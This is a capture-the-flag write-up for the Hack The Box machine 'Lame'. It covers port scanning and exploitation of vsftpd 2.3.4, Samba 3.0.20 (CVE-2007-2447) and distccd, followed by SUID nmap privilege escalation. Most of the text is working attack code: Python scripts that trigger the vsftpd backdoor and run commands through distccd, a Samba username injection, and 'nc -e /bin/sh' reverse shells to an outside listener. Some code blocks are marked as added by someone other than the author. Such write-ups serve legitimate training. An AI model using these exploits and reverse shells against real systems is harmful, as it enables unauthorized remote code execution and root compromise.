Hack The Box - Lame Writeup


Enumeration

Start with a full-port nmap scan with version and OS detection.

Nmap

Nmap scan report for lame.com (10.10.10.3)
Host is up, received user-set (0.26s latency).
Scanned at 2020-06-21 02:01:21 EDT for 582s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT     STATE SERVICE     REASON         VERSION
21/tcp   open  ftp         syn-ack ttl 63 vsftpd 2.3.4
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 21 02:11:03 2020 -- 1 IP address (1 host up) scanned in 583.83 seconds

That gives us several attack vectors to look at: vsftpd 2.3.4 on 21, Samba on 139/445 and distccd on 3632.

vsftpd 2.3.4

kali@kali:~$ searchsploit vsftpd 2.3.4 | cut -b -100
----------------------------------------------------------------------------------------------------
 Exploit Title
----------------------------------------------------------------------------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
----------------------------------------------------------------------------------------------------
Shellcodes: No Result

This version of vsftpd carries a backdoor: a username that ends in :) makes the daemon open a shell on TCP port 6200 (that port comes from the public advisory, not from the scan above). On this box the exploit failed and did not give a shell.
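To see what the Metasploit module actually does, here is the trigger done by hand in Python. This is an added example, not code from the writeup: the target address 10.10.10.3 is taken from the scan, and the backdoor port 6200 is an assumption based on the public advisory rather than anything observed on this box.

```python
import socket

# The backdoor shell's port comes from the public vsftpd 2.3.4 advisory, not from the scan above
BACKDOOR_PORT = 6200
TARGET = "10.10.10.3"   # assumed from the nmap output; change for your box


def build_trigger(user="x", password="x"):
    """FTP login whose username ends in ':)'. That smiley is the whole trigger."""
    return f"USER {user}:)\r\nPASS {password}\r\n".encode()


def trigger_backdoor(host, port=21, timeout=5):
    """Send the trigger over the control connection. vsftpd never finishes the login,
    so a timeout on the second read is the normal outcome, not an error."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)                     # 220 banner
        s.sendall(build_trigger())
        try:
            s.recv(1024)
        except socket.timeout:
            pass


def run_via_backdoor(host, cmd, timeout=5):
    """Connect to the backdoor shell and run one command. Returns None when port 6200
    is not open, which is what happened on this box."""
    try:
        s = socket.create_connection((host, BACKDOOR_PORT), timeout=timeout)
    except OSError:
        return None
    marker = "__end__"
    out = b""
    with s:
        # The shell prints no prompt, so append a marker to know when the output is complete
        s.sendall(f"{cmd}; echo {marker}\n".encode())
        while marker.encode() not in out:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            out += chunk
    return out.decode(errors="replace").replace(marker, "").strip()


if __name__ == "__main__":
    trigger_backdoor(TARGET)
    print(run_via_backdoor(TARGET, "id"))
```

If run_via_backdoor returns None right after the trigger, port 6200 never opened, which matches what happened here; the Metasploit module performs the same check before declaring success.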

Method 1 (Samba 3.0.20 Without Metasploit)

smbmap

kali@kali:~/Desktop/htb/lame$ smbmap -H lame.com
[+] Finding open SMB ports....
[+] User SMB session established on lame.com...
[+] IP: lame.com:445    Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

smbmap shows that the tmp share is readable and writable without credentials, but there was nothing interesting in it. The IPC$ comment also leaks the exact Samba version, 3.0.20-Debian, which nmap only reported as 3.X - 4.X.

Searchsploit

kali@kali:~$ searchsploit samba 3.0.20 | cut -b -150
------------------------------------------------------------------------------------------------------------------------------------------------------
 Exploit Title
------------------------------------------------------------------------------------------------------------------------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
Samba < 3.0.20 - Remote Heap Overflow
------------------------------------------------------------------------------------------------------------------------------------------------------

The first entry matches: Samba 3.0.20 up to 3.0.25rc3 is vulnerable to command injection through the username map script option (CVE-2007-2447), and there is a Metasploit module for it (exploit/multi/samba/usermap_script).

Understanding the metasploit code

Going through the short exploit, we can check the exploit function to see how it works.

def exploit
  connect
  username = "/=`nohup " + payload.encoded + "`"
  begin
    simple.client.negotiate(false)
    simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
  rescue ::Timeout::Error, XCEPT::LoginError
    # nothing, it either worked or it didn't ;)
  end

  handler
end

The payload is placed inside backticks (which the shell evaluates as a command) in the username, prefixed with nohup so the command keeps running after smbd tears down the SMB session. It reaches a shell because smbd hands the supplied username to the configured username map script without sanitising it. Sending the same username with smbclient did not work, however: the username was getting capitalized before it was sent.

We can get around this by first connecting to the share and then passing the username through the logon command inside smbclient, which sends it unchanged. On Kali 2020 (Samba 4.11 and later) the SMB1 client is disabled by default, so add --option='client min protocol=NT1' or smbclient will refuse to talk to this old server.

kali@kali:~/Desktop/htb/lame$ sudo smbclient \\\\lame.com\\tmp --option='client min protocol=NT1'
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.14.34 1337`"
Password:

Start an nc listener on port 1337 before issuing the logon command and wait for the connection:

kali@kali:~$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.34] from lame.com [10.10.10.3] 34789
id
uid=0(root) gid=0(root)

We are root!

I also found a python script for exploiting this. We can also achieve root using this script.

Method 2 (DistCC Daemon RCE)

There is a distcc daemon running on port 3632. Both a Metasploit module (exploit/unix/misc/distcc_exec) and an nmap NSE script (distcc-cve2004-2687) are available for it.

kali@kali:~/Desktop/htb/lame$ searchsploit distcc | cut -b -150
---------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                              |  Path
                                                                            | (/usr/share/exploitdb/)
---------------------------------------------------------------------------- ----------------------------------------
DistCC Daemon - Command Execution (Metasploit)                              | exploits/multiple/remote/9915.rb
---------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Looking at the nmap script, we can see how it builds the request:

local cmds = {
  "DIST00000001",
  ("ARGC00000008ARGV00000002shARGV00000002-cARGV%08.8xsh -c " ..
  "'(%s)'ARGV00000001#ARGV00000002-cARGV00000006main.cARGV00000002" ..
  "-oARGV00000006main.o"):format(10 + #arg_cmd, arg_cmd),
  "DOTI00000001A\n",
}

Each token is four letters followed by its length (or value) as eight zero-padded hex digits (%08.8x). For the command argument the length is the command length plus 10, the extra bytes of the sh -c '( ... )' wrapper. The real compiler flags follow after a #, so the shell treats them as a comment.

With the help of this article I wrote a Python script to exploit it. The reply also contains distccd's own output, so the script echoes a separator before and after our command and keeps only the part in between.

import socket

# Separator used to cut our command's output out of the rest of distccd's reply
SEP = "sep123"

while True:
    cmd = input("cmd>")
    new_cmd = f"echo -n {SEP};{cmd};echo -n {SEP}"
    # Each token is 4 letters + an 8-digit zero-padded hex length (%08x in the nmap script);
    # {len:8x} would pad with spaces, so use :08x
    payload = (f"DIST00000001ARGC00000008ARGV00000002shARGV00000002-c"
               f"ARGV{len(new_cmd):08x}{new_cmd}"
               f"ARGV00000001#ARGV00000002-cARGV00000006main.cARGV00000002-oARGV00000006main.o"
               f"DOTI00000001A")
    with socket.create_connection(("lame.com", 3632)) as s:
        s.sendall(payload.encode())
        # Read until distccd closes the connection; a single recv(1000) can truncate the output
        data = b""
        while chunk := s.recv(4096):
            data += chunk
    parts = data.decode(errors="replace").split(SEP)
    print(parts[1].strip() if len(parts) > 2 else data.decode(errors="replace"))
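The separator trick works, but distccd already returns the job's stdout in a field of its own, so the reply can simply be parsed. The following is an added example, not the writeup's script: it builds the request the way the nmap script does and decodes the DONE/STAT/SERR/SOUT/DOTO tokens of the reply as described in distcc's protocol documentation (my reading of it). The sample reply is constructed for the test, and the host name is assumed from the writeup.

```python
import socket


def token(name, value):
    """distcc tokens: 4 ASCII letters + 8 zero-padded lowercase hex digits (the nmap script's %08.8x)."""
    return f"{name}{value:08x}".encode()


def build_request(cmd, version=1):
    """Same trick as the nmap script: the 'compiler' is a shell, and a # turns the
    real compiler flags that follow into a comment."""
    wrapped = f"sh -c '({cmd})'"        # 10 bytes of wrapper, hence the +10 in the nmap script
    argv = ["sh", "-c", wrapped, "#", "-c", "main.c", "-o", "main.o"]
    req = token("DIST", version) + token("ARGC", len(argv))
    for arg in argv:
        req += token("ARGV", len(arg)) + arg.encode()
    return req + token("DOTI", 1) + b"A"   # one byte of 'preprocessed source'


def parse_response(data):
    """Walk the reply tokens. DONE and STAT carry plain values; SERR, SOUT and DOTO
    carry a length followed by that many bytes. The job's stdout is in SOUT."""
    pos, fields = 0, {}
    while pos + 12 <= len(data):
        name = data[pos:pos + 4].decode()
        value = int(data[pos + 4:pos + 12], 16)
        pos += 12
        if name in ("DONE", "STAT"):
            fields[name] = value
        else:
            fields[name] = data[pos:pos + value]
            pos += value
    return fields


def run(host, cmd, port=3632, timeout=10):
    """Send one job and return (stdout, stderr, exit status) of the injected command."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(cmd))
        data = b""
        while chunk := s.recv(4096):   # distccd closes the connection after one job
            data += chunk
    fields = parse_response(data)
    return (fields.get("SOUT", b"").decode(errors="replace"),
            fields.get("SERR", b"").decode(errors="replace"),
            fields.get("STAT"))


# Constructed sample of what distccd sends back for `id` (not captured from the box)
SAMPLE_RESPONSE = (b"DONE00000001STAT00000000SERR00000000SOUT0000002d"
                   b"uid=1(daemon) gid=1(daemon) groups=1(daemon)\n")


if __name__ == "__main__":
    print(parse_response(SAMPLE_RESPONSE)["SOUT"].decode(), end="")
    stdout, stderr, status = run("lame.com", "id")   # host assumed from the writeup
    print(stdout, stderr, status)
```

Because the exit status and stderr come back as separate fields, a command that fails is visible as such instead of producing an empty slice between two separators.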

User Shell

Run the script to confirm execution, then use it to spawn a reverse shell back to an nc listener started beforehand:

kali@kali:~/Desktop/htb/lame$ python3 exp.py
cmd>id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
cmd>ls
5194.jsvc_up
distcc_d115ebee.stdout
distcc_d13febee.stderr
distccd_d6bdebee.o
distccd_d6c4ebee.i
cmd>nc -e /bin/sh 10.10.14.34 1337
kali@kali:~/Desktop/htb/lame$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.34] from lame.com [10.10.10.3] 38311
python -c 'import pty;pty.spawn("bash")'
daemon@lame:/tmp$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Root shell

Looking around the system, there is an old nmap binary (4.53) with the SUID bit set. Old versions of nmap (up to 5.21) have an --interactive mode that runs shell commands with !, and since the binary is SUID root that gives us a root shell.

daemon@lame:/tmp$ nmap --interactive
nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
sh-3.2# cat /root/root.txt
cat /root/root.txt
92caac**********************

And we are root. Only the effective uid is 0 here (the real uid is still daemon), but that is enough to read the flag.
